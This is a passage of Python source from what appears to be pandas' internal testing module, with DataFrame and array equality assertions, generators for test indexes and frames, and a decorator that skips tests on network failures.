assert_categorical_equal(left.values, right.values, obj=f"{obj} category")
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=False,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
    differences. It is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}",
)
if check_like:
left, right = left.reindex_like(right), right
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.columns",
)
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
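# Dispatch sketch (illustrative):
#
#     >>> assert_equal(pd.Index([1, 2]), pd.Index([1, 2]))          # -> assert_index_equal
#     >>> assert_equal(np.array([1.0, 2.0]), np.array([1.0, 2.0]))  # -> assert_numpy_array_equal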
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
            # for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
if is_period_dtype(obj):
return period_array(obj)
elif is_datetime64_dtype(obj) or is_datetime64tz_dtype(obj):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(obj):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(
left,
right,
check_dtype=True,
check_kind=True,
check_fill_value=True,
consolidate_block_indices=False,
):
"""Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
check_dtype : bool, default True
Whether to check the data dtype is identical.
check_kind : bool, default True
        Whether to compare just the kind of the sparse index for each column.
check_fill_value : bool, default True
Whether to check that left.fill_value matches right.fill_value
consolidate_block_indices : bool, default False
Whether to consolidate contiguous blocks for sparse arrays with
a BlockIndex. Some operations, e.g. concat, will end up with
block indices that could be consolidated. Setting this to true will
create a new BlockIndex for that array, with consolidated
block indices.
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values, check_dtype=check_dtype)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
if not check_kind:
left_index = left.sp_index.to_block_index()
right_index = right.sp_index.to_block_index()
else:
left_index = left.sp_index
right_index = right.sp_index
if consolidate_block_indices and left.kind == "block":
# we'll probably remove this hack...
left_index = left_index.to_int_index().to_block_index()
right_index = right_index.to_int_index().to_block_index()
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
        # indices are equal; nothing further to check
pass
if check_fill_value:
assert_attr_equal("fill_value", left, right)
if check_dtype:
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense(), check_dtype=check_dtype)
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
return dr
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
        * id : int dtype with Poisson-distributed values (lam=1000)
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def all_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the various
index classes.
Parameters
----------
k: length of each of the index instances
"""
all_make_index_funcs = [
makeIntIndex,
makeFloatIndex,
makeStringIndex,
makeUnicodeIndex,
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeBoolIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
]
for make_index_func in all_make_index_funcs:
yield make_index_func(k=k)
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func
def all_timeseries_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(N)
data = Index(data, dtype=object)
index = makeStringIndex(N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(N)
return {c: Series(randn(N), index=index) for c in getCols(K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
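# Illustrative sketch (not part of the original module): two ways makeCustomIndex
# might be called, wrapped in a helper so nothing executes at import time.
def _example_make_custom_index():
    # Single-level string index of 5 entries with the default name "#0".
    flat = makeCustomIndex(5, nlevels=1, names=True)
    # 2-level MultiIndex of 6 entries; each first-level label repeats twice.
    multi = makeCustomIndex(6, nlevels=2, names=["outer", "inner"], ndupe_l=[2])
    return flat, multi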
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
nrows, ncols - number of data rows/cols
    c_idx_names, r_idx_names - False/True/list of strings, yields no names,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples:
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
    # 4-level multiindex on rows with names provided, 2-level multiindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingCustomDataframe(
nrows,
ncols,
density=0.9,
random_state=None,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Parameters
----------
    density : float, optional
        Float in (0, 1) that gives the proportion of non-missing numbers in
        the DataFrame.
random_state : {np.random.RandomState, int}, optional
Random number generator or random seed.
See makeCustomDataframe for descriptions of the rest of the parameters.
"""
df = makeCustomDataframe(
nrows,
ncols,
c_idx_names=c_idx_names,
r_idx_names=r_idx_names,
c_idx_nlevels=c_idx_nlevels,
r_idx_nlevels=r_idx_nlevels,
data_gen_f=data_gen_f,
c_ndupe_l=c_ndupe_l,
r_ndupe_l=r_ndupe_l,
dtype=dtype,
c_idx_type=c_idx_type,
r_idx_type=r_idx_type,
)
i, j = _create_missing_idx(nrows, ncols, density, random_state)
df.values[i, j] = np.nan
return df
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
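# Illustrative sketch (not part of the original module): with density=0.9 roughly
# ten percent of the cells in the generated frame end up as NaN.
def _example_missing_frame():
    df = makeMissingDataframe(density=0.9, random_state=42)
    return df.isna().to_numpy().mean()  # approximately 0.1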
def optional_args(decorator):
"""allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
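# Illustrative sketch (not part of the original module): a decorator built on top of
# optional_args can be applied either bare or with keyword arguments. It relies on
# the module-level ``wraps`` import.
@optional_args
def _example_tag(func, label="default"):
    @wraps(func)
    def inner(*args, **kwargs):
        return label, func(*args, **kwargs)
    return inner
# Both forms are accepted:
#   @_example_tag                    -> label stays "default"
#   @_example_tag(label="custom")    -> label becomes "custom"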
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="http://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
    This decorator also adds a contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'http://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
        Any exception that has .errno or .reason.errno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
    * ``raise_on_error`` supersedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
    Traceback (most recent call last):
    ...
    URLError: <urlopen error unknown url type: rabbit>
You can specify alternative URLs::
>>> @network("http://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if check_before_test and not raise_on_error:
if not can_connect(url, error_classes):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
            if not errno and hasattr(err, "reason"):
errno = getattr(err.reason, "errno", None)
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning=Warning,
filter_level="always",
clear=None,
check_stacklevel=True,
raise_on_extra_warnings=True,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
clear : str, default None
If not ``None`` then remove any previously raised warnings from
the ``__warningsregistry__`` to ensure that no warning messages are
suppressed by this context manager. If ``None`` is specified,
the ``__warningsregistry__`` keeps track of which warnings have been
shown, and does not show them again.
check_stacklevel : bool, default True
If True, displays the line that called the function containing
        the warning to show where the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
    .. warning:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
if clear is not None:
# make sure that we are clearing these warnings
# if they have happened before
# to guarantee that we will catch them
if not is_list_like(clear):
clear = [clear]
for m in clear:
try:
m.__warningregistry__.clear()
except AttributeError:
# module may not have __warningregistry__
pass
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if expected_warning and issubclass(
actual_warning.category, expected_warning
):
saw_warning = True
